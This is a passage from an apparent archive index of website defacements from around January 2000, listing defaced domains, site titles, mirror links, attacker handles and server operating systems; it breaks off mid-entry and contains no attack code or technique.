Potentially offensive content on defaced page. Defaced domain: www.akte.com.sa Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.akte.com.sa Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.blanchettefamily.com Site Title: Paul Blanchette Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.blanchettefamily.com Defaced by: acidklown Operating System: Windows 95 (Microsoft-PWS-95) Potentially offensive content on defaced page. Defaced domain: www.bhv.hn Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.bhv.hn Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Previously defaced on (4 different days) by Potentially offensive content on defaced page. Defaced domain: primario.cesae.pt Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/primario.cesae.pt Defaced by: IronY and Adoni Operating System: NT Defaced domain: ar.ru Site Title: Stanford Trident international Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/ar.ru Defaced by: IronY and Adoni Operating System: NT Defaced domain: amg.ar.ru Site Title: Stanford Trident international Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/amg.ar.ru Defaced by: IronY and Adoni Operating System: NT Defaced domain: TOUROU.edu Site Title: Touro University International Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/TOUROU.edu Defaced by: IronY and Adoni Operating System: NT Potentially offensive content on defaced page. Defaced domain: misi.minolta.com Site Title: Minolta Information Systems Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/misi.minolta.com Operating System: Windows NT HIDDEN comments in the HTML. Defaced domain: www.usembassy-china.org.cn Site Title: Embassy of the United States of America in China Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.usembassy-china.org.cn Defaced by: floppynuts and captain pen0r Operating System: Solaris Previously defaced on 99.09.11 99.05.10 by Hi-Tech Hate Defaced domain: www.mysticvalleyrealty.com Site Title: ystic Valley Real Estate, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.mysticvalleyrealty.com Defaced by: Algorithm Cracker Operating System: Windows NT HIDDEN comments in the HTML. Defaced domain: www.pandaman.com Site Title: Panda Man Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.pandaman.com Defaced by: freax Operating System: Windows NT Defaced domain: www.csbsys.com Site Title: CSB Systems Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.csbsys.com Defaced by: Algorithm Cracker Operating System: SCO Unix Defaced domain: www.lloydsoflondon.co.uk Site Title: Lloyds of London Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.lloydsoflondon.co.uk Defaced by: X Operating System: Windows NT Defaced domain: www.swcs.org Site Title: Soil and Water Conservation Society Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.swcs.org Defaced by: Team Echo Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.aoc.com Site Title: PRC Inc Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.aoc.com Defaced by: traceroute Operating System: Windows NT Attrition comment: This site was previously defaced on 99.12.30 and 99.12.31 by FiberOPS and Hardc0rps Defaced domain: www.nlc.org Site Title: National League of Cities Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.nlc.org Defaced by: unknown Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.micros0ft.co.uk Site Title: F Communications Limited Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.micros0ft.co.uk Defaced by: arkitekt Operating System: Linux Defaced domain: www.nightfalls.com Site Title: Night Falls Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.nightfalls.com Defaced by: bansh33 Operating System: Linux Defaced domain: www.e-business.com.my Site Title: E-Business Malaysia Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.e-business.com.my Defaced by: Sewerage shit Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.lexstar.com Site Title: Lexstar, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.lexstar.com Defaced by: w0lf Operating System: Irix Potentially offensive content on defaced page. Defaced domain: www.worcester.edu Site Title: Worcester State College Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.worcester.edu Defaced by: blairox Operating System: Windows NT Defaced domain: www.gddc.pt Site Title: Gabinete de Documentação e Direito Comparado (GDDC) Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.gddc.pt Defaced by: ph33r th3 b33r Operating System: Windows NT Previously defaced on 99.12.23 by Shandar Defaced domain: ns1.secure.net.uk Site Title: SecureNet UK Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/ns1.secure.net.uk Defaced by: Irony and Adoni Operating System: Windows NT Defaced domain: vipor1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/vipor1.uky.edu Defaced by: Irony Operating System: Windows NT Defaced domain: vipor2.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/vipor2.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: syquery.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/syquery.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: prxy1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/prxy1.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: ghi.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/ghi.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: vip1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/vip1.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: hrdbdev1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/hrdbdev1.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.gn1.net Site Title: GLINN Publishing Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.gn1.net Defaced by: hV2k Operating System: Windows NT Potentially offensive content on defaced page. Attrition comment: Reportedly an ISP for X-Rated Web sites Defaced domain: service9.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/service9.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.wwasp.com Site Title: Worldwide Association of Specialty Programs Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.wwasp.com Defaced by:unknown Operating System: Windows NT Potentially offensive content on defaced page. Attrition comment: The link on the defaced page points to an apparent clearing house of articles about WWASP that shows it to be a shadowy organization. Several allegations of child abuse have been made according to these articles Defaced domain: www.cardiff.gov.uk Site Title: Cardiff Government Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.cardiff.gov.uk Defaced by: SuperSheep Operating System: Windows NT Defaced domain: huk.8k.com Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/huk.8k.com Defaced by: TecH & Cynical Operating System: Linux Defaced domain: www.immigration-canada.com Site Title: Colin R. Singer & Associates Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.immigration-canada.com Defaced by: Dead-Socket Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.njreporter.org Site Title: The New Jersey Reporter Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.njreporter.org Defaced by: Dead-Socket Operating System: Linux Potentially offensive content on defaced page. Defaced domain: ericsson.com.tw Site Title: Ericsson Taiwan Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/ericsson.com.tw Defaced by: inferno.br Operating System: NT Defaced domain: www.abevents.com Site Title: 0Alexandra Barnett Events Mirror: http://www.attrition.org/mirror/attrition/2000/01/03/www.abevents.com Defaced by: Neutron Operating System: Win 95 Defaced domain: www.emerge-technologies.com Site Title: Emerge Technologies, LLC. Mirror: http://www.attrition.org/mirror/attrition/2000/01/03/www.emerge-technologies.com Defaced by: Niel and Bob Potentially offensive content on defaced page. Defaced domain: mail.allianttech.com Site Title: Alliant Technologies Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/03/mail.allianttech.com Defaced by: The Keebler Elfs Operating System: NT Defaced domain: www.gn1.com Site Title: GLINN Publishing Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.gn1.com Defaced by: hV2k Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: prxy1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/prxy1.uky.edu Defaced by: Ossama Bin Laden hackers Operating System: Windows NT Attrition comment: Mass hack by OBL hackers Defaced domain: www.cmmr.com.cn Site Title: Beijing Mainland Marketing Research Co Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.cmmr.com.cn Defaced by: Inferno.br Operating System: Windows NT Previously defaced on 99.10.18 by unknown Defaced domain: www.phreak2000.com Site Title: Phreak2000 Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.phreak2000.com Defaced by: y2k Crew Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.bluehat.com Site Title: BlueHat Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.bluehat.com Defaced by: Klept0 Operating System: Red Hat Linux Defaced domain: www.virtualshack.com Site Title: Professional Hackers Clan Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.virtualshack.com Defaced by: Virtual Shack ^^^ Operating System: Windows NT Previously defaced on 99.12.22 99.12.27 99.12.30 by BLN OHB Potentially offensive content on defaced page. Defaced domain: www.sd02.k12.id.us Site Title: Meridian joint school district Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.sd02.k12.id.us Defaced by: hV2k Operating System: Windows NT Defaced domain: syquery.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/syquery.uky.edu Defaced by: ussama bin laden hackers Operating System: NT Defaced domain: backup-www.rnet.ucla.edu Site Title: CLA RNet backup server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/backup-www.rnet.ucla.edu Defaced by: IronY and Dec0 Operating System: Windows NT Defaced domain: www.microsoft.com.tw Site Title: Microsoft Taiwan Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.microsoft.com.tw Defaced by: Inferno.br Operating System: NT Defaced domain: development.rnet.ucla.edu Site Title: UCLA RNet development server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/development.rnet.ucla.edu Defaced by: IronY and Dec0 Operating System: Windows NT Defaced domain: techware.mit.edu Site Title: MIT TechWare Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/techware.mit.edu Defaced by: Dec0 Operating System: Windows NT Attrition comment: This is the FIRST reported defacement of an MIT Web server Defaced domain: udc.mit.edu Site Title: MIT UDC Server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/udc.mit.edu Defaced by: comdak Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: tpc.mit.edu Site Title: MIT TPC server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/tpc.mit.edu Defaced by: comtrak Operating System: Windows NT Defaced domain: tpc.mit.edu Site Title: MIT TPC server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/tpc.mit.edu Defaced by: comtrak Operating System: Windows NT Defaced domain: selway.nic.edu Site Title: North Idaho College Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/selway.nic.edu Defaced by: IronY Operating System: Windows NT Defaced domain: ceto.mit.edu Site Title: MIT Ceto server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/ceto.mit.edu Defaced by: comtak Operating System: Windows NT Defaced domain: lean2.mit.edu Site Title: Massachusetts Institute of Technology Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/lean2.mit.edu Defaced by: Algorithm Cracker Operating System: 95 HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.bmc.umich.edu Site Title: University of Michigan -- ITD Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.bmc.umich.edu Defaced by: herf Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.dunnavan.com Site Title: C.C. Dunnavan & Co. Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.dunnavan.com Defaced by: Tron Operating System: NT Defaced domain: radiologycme.stanford.edu Site Title: Stanford University Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/radiologycme.stanford.edu Defaced by: Algorithm Cracker Operating System: NT HIDDEN comments in the HTML. Defaced domain: www.goldsys.org Site Title: Goldsys Technology Corp. Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.goldsys.org Defaced by: Keebler Elfes Operating System: Linux Defaced domain: www.conceptairsys.com Site Title: Concept Air Systems Ltd Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.conceptairsys.com Defaced by: evader Operating System: NT Potentially offensive content on defaced page. Attrition comment: Mass defacement. Same defacement: http://www.materials.building-trades.com/ Defaced domain: www.nightfalls.com Site Title: Night Falls Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.nightfalls.com Defaced by: OHB Operating System: Linux Defaced domain: www.nightfalls.com Site Title: Night Falls Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.nightfalls.com Defaced by: OHB Operating System: Linux Defaced domain: www.420ville.com Site Title: DW Sales Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.420ville.com Defaced by: acidklown & xhostile Operating System: 95 Potentially offensive content on defaced page. Defaced domain: mmspubden.mms.gov Site Title: MMS Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/mmspubden.mms.gov Defaced by: NET ILLUSION Operating System: NT Defaced domain: www.lutherancentraldist.org Site Title: Lutheran Church-Canada, Central District Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.lutherancentraldist.org Defaced by: acid klown Operating System: 95 Potentially offensive content on defaced page. Attrition comment: Free Kevin HREFs embedded in page Defaced domain: www.info-mgmt.com Site Title: Information Management Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.info-mgmt.com Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/3.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.virtualtk.com Site Title: Virtual Technologies Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.virtualtk.com Defaced by: w0lf Operating System: Irix Defaced domain: gtanet.region.halton.on.ca Site Title: GTA Network Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/gtanet.region.halton.on.ca Defaced by: Algorithm Cracker Operating System: Windows NT HIDDEN comments in the HTML. Defaced domain: www.ond.vlaanderen.be Site Title: Ministerie van de Vlaamse Gemeenschap Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.ond.vlaanderen.be Defaced by: Indig00 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.chamber.etobicoke.on.ca Site Title: Etobicoke Chamber of Commerce Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.chamber.etobicoke.on.ca Defaced by: Algorithm Hacker Operating System: Windows NT HIDDEN comments in the HTML. Defaced domain: www.worldevangelical.org Site Title: World Evangelical Fellowship Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.worldevangelical.org Defaced by: Ass0mbracao Operating System: Linux Previously defaced on 99.12.18 99.12.19 by Analognet Fuby Potentially offensive content on defaced page. Defaced domain: www.bcmhs.bc.ca Site Title: Riverview Hospital Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.bcmhs.bc.ca Defaced by: Algorithm Cracker Operating System: Windows 95 HIDDEN comments in the HTML. Defaced domain: citx.com Site Title: Computer Innovations of Texas Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/citx.com Defaced by: z3d Operating System: Solaris Defaced domain: bamfield.sd70.bc.ca Site Title: Bamfield Community Access Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/bamfield.sd70.bc.ca Defaced by: Algorithm Cracker Operating System: Windows NT Defaced domain: www.oct.on.ca Site Title: Ontario College of Teachers Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.oct.on.ca Defaced by: Algorithm Cracker Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: gtanet.region.halton.on.ca Site Title: GTA Network Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/gtanet.region.halton.on.ca Defaced by: unknown Operating System: Windows NT HIDDEN comments in the HTML. Attrition comment: This is a redefacement commenting on Algoritm Cracker referring to all Canadian admins as "lame" Defaced domain: www.slak.net Site Title: Slaknet Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.slak.net Defaced by: dhc Operating System: Linux (Apache 1.3.9) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.eud.dk Site Title: Eu-Direktoratet Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.eud.dk Defaced by: da dragon Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: smtpmta.aim.edu Site Title: Asian Institute of Management Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/smtpmta.aim.edu Defaced by: comdak Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.homeport.bc.ca Site Title: Bazan Bay o/a HomePort Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.homeport.bc.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: smtpmta.aim.edu Site Title: Asian Institute of management Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/smtpmta.aim.edu Defaced by: chickie Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.smus.bc.ca Site Title: St. Michaels University School Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.smus.bc.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.) Potentially offensive content on defaced page. Defaced domain: www.swim.bc.ca Site Title: Swim B.C. Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.swim.bc.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: lab1.chem.queensu.ca Site Title: Queen University's Chemistry Laboratory Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/lab1.chem.queensu.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.tltc.shu.edu Site Title: Seton Hall University Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.tltc.shu.edu Defaced by: algorithm cracker Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.law.ubc.ca Mirror: http://www.attrition.org/mirror/attrition/2000/01/05/www.law.ubc.ca Defaced by: Algorithm Cracker Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cio.usmc.mil Site Title: US Marine Corps Chief Information Officer Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.cio.usmc.mil Defaced by: hV2k Operating System: NT Defaced domain: www.doe-md.gov Site Title: Dept. of Energy Miamisburg Environmental Management Project Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.doe-md.gov Defaced by: hV2k Operating System: NT Defaced domain: www.hcfa.gov Site Title: Health Care Financing Administration Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.hcfa.gov Defaced by: hV2k Operating System: NT Site Title: US Institute For Environmental Conflict Resolution Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.ecr.gov Defaced by: Powr Operating System: Linux HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.highlevelalarms.com Site Title: High Level Alarms Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.highlevelalarms.com Defaced by: Political Genocide Operating System: Digital Unix Potentially offensive content on defaced page. Defaced domain: www.cosmicdust.com Site Title: Dennis Kerrigan Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.cosmicdust.com Defaced by: Evader Operating System: Windows NT (WebSitePro/2.4.9) Potentially offensive content on defaced page. Defaced domain: www.cosmicdust.com Site Title: Dennis Kerrigan Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.cosmicdust.com Defaced by: Evader Operating System: Windows NT (WebSitePro/2.4.9) Potentially offensive content on defaced page. Defaced domain: sshs.pcclub.org Site Title: Santa Susana High School PC Club Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/sshs.pcclub.org Defaced by: DeniaL Operating System: SuSE Linux Defaced domain: www.computicket.co.za Site Title: CompuTicket Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.computicket.co.za Defaced by: aKt0r Operating System: Windows NT Defaced domain: www.msiimaging.com Site Title: Microfilming Services, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.msiimaging.com Defaced by: Uneek Tech Operating System: Linux Previously defaced on 99.10.07 by Narr0w Potentially offensive content on defaced page. Defaced domain: eec.psu.edu Site Title: Leonhard Center for the Enhancement of Engineering Education at Penn State Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/eec.psu.edu Defaced by: herf Operating System: Windows NT Defaced domain: www.pranky.com Site Title: ]United Phreaks Syndicate Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.pranky.com Defaced by: wkD Operating System: Linux Defaced domain: www.ndn.co.jp Site Title: Nippon Data Net Limited Partnership Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.ndn.co.jp Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 5 times by Potentially offensive content on defaced page. Defaced domain: www.infoctr.edu Site Title: Library of International Relations Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.infoctr.edu Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.23 by thesaint666 Potentially offensive content on defaced page. Defaced domain: www.mysticvalleyrealty.com Site Title: Mystic Valley Real Estate Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.mysticvalleyrealty.com Defaced by: OHB Operating System: Windows NT (WebSitePro/2.3.15) Potentially offensive content on defaced page. Defaced domain: www.systemsontime.com Site Title: Systems On Time Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.systemsontime.com Defaced by: auto36047@hushmail.com Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.fashion.com.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.fashion.com.br Defaced by: _COBAIA_AND_VIBORA_ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.rmsd.com Site Title: Rocky Mountain Systems Design Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.rmsd.com Defaced by: POTS Operating System: Linux (Apache 1.2.5) Potentially offensive content on defaced page. Defaced domain: www.technowolf.com Site Title: Technowolf Web Design Mirror: http://www.attrition.org/mirror/attrition/2000/01/06/www.technowolf.com Defaced by: auto36047@hushmail.com Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.thephatmall.com Site Title: Antwone Walters Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.thephatmall.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.gayheaven.net Site Title: Andreas Bolin Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.gayheaven.net Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.fun-police.com Site Title: Chad Reese Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.fun-police.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.yourwebhome.com Site Title: Graficom Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.yourwebhome.com Defaced by: HiP Operating System: Debian Linux Potentially offensive content on defaced page. Defaced domain: www.assespro.org.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.assespro.org.br Defaced by: Aresnations Team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.troop79.org Site Title: Boy Scouts of America - Troop 79 Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.troop79.org Defaced by: Team Echo Operating System: Solaris 2.6 - 2.7 Potentially offensive content on defaced page. Defaced domain: www.domainowners.com Site Title: 980 E 18 Street Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.domainowners.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.dvdweddings.com Site Title: Pacific Video Image Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.dvdweddings.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.e3.com Site Title: E3 Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.e3.com Defaced by: Carte Blanche Operating System: Windows NT (IIS/4.)) Potentially offensive content on defaced page. Defaced domain: www.Girlscoutstotem.org Site Title: Girl Scouts - Totem Council Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.Girlscoutstotem.org Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.samilchurch.com Site Title: Samil Church Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.samilchurch.com Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.independentbaptist.net Site Title: Freedom Baptist Temple Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.independentbaptist.net Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.mgaa.com Site Title: Minority Golf Association of America Mirror: http://www.attrition.org/mirror/attrition/2000/01/07/www.mgaa.com Defaced by: Team Echo Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.ozarkad.com Site Title: Ozark Advertising and Communications Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.ozarkad.com Defaced by: BlazinWeed Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.intense-city.net Site Title: CHS Enterprises Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.intense-city.net Defaced by: BlazinWeed Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.brabant.nl Site Title: Provinciehuis Brabant Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.brabant.nl Defaced by: Scrippie Operating System: WinNT Defaced domain: www.flysaturn.com Site Title: Saturn Computer Sevices Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.flysaturn.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.idgames.com Site Title: Idiot Games Inc Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.idgames.com Defaced by: Debian Operating System: FreeBSD Defaced domain: www.myweb-site.com Site Title: My Web Site Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.myweb-site.com Defaced by: Secto0r Operating System: Linux Defaced domain: www.your-name-here.co.uk Site Title: Your Name Here Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.your-name-here.co.uk Defaced by: Secto0r Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.richmond.com.ar Site Title: Richmond Publishing Argentina Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.richmond.com.ar Defaced by: Team Echo Operating System: Windows NT Defaced domain: www.samilchurch.com Site Title: Samil Church Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.samilchurch.com Operating System: Linux Defaced domain: www.computereveryone.com Site Title: Computer Everyone Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.computereveryone.com Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.capitolareanetworks.com Site Title: Capitol Area Networks Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.capitolareanetworks.com Defaced by: hV2k Operating System: Windows NT Defaced domain: www.securityseekers.com Site Title: Security Seekers Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.securityseekers.com Defaced by: Morbid Angel Operating System: Linux Defaced domain: www.gayheaven.net Site Title: Gay Heaven Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.gayheaven.net Defaced by: mattchew Operating System: Linux Defaced domain: www.adrica.com Site Title: Adrica Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.adrica.com Defaced by: mattchew Operating System: Linux Defaced domain: www.badjura-petri.com Site Title: Badjura und Petri Hoch Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.badjura-petri.com Defaced by: stealth Operating System: Windows NT HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.ahost4u.com Site Title: A Host for You Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.ahost4u.com Defaced by: secto0r Operating System: Linux Defaced domain: www.search-party.com Site Title: Search Party Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.search-party.com Defaced by: DHC Operating System: Solaris Defaced domain: www.brisolla.com.br Site Title: Brisolla Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.brisolla.com.br Defaced by: Death Corporation Operating System: Windows NT Defaced domain: www.assespro.org.br Site Title: Asses Pro Brazil Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.assespro.org.br Defaced by: OHB Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.fetishfish.com Site Title: Fetish Fish Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.fetishfish.com Defaced by: mattchew Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.online-manual.com Site Title: Online Manual Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.online-manual.com Defaced by: secto0r Operating System: Linux Defaced domain: www.swim.bc.ca Site Title: Swim B.C. Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.swim.bc.ca Defaced by: OHB Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.smus.bc.ca Site Title: St. Michaels 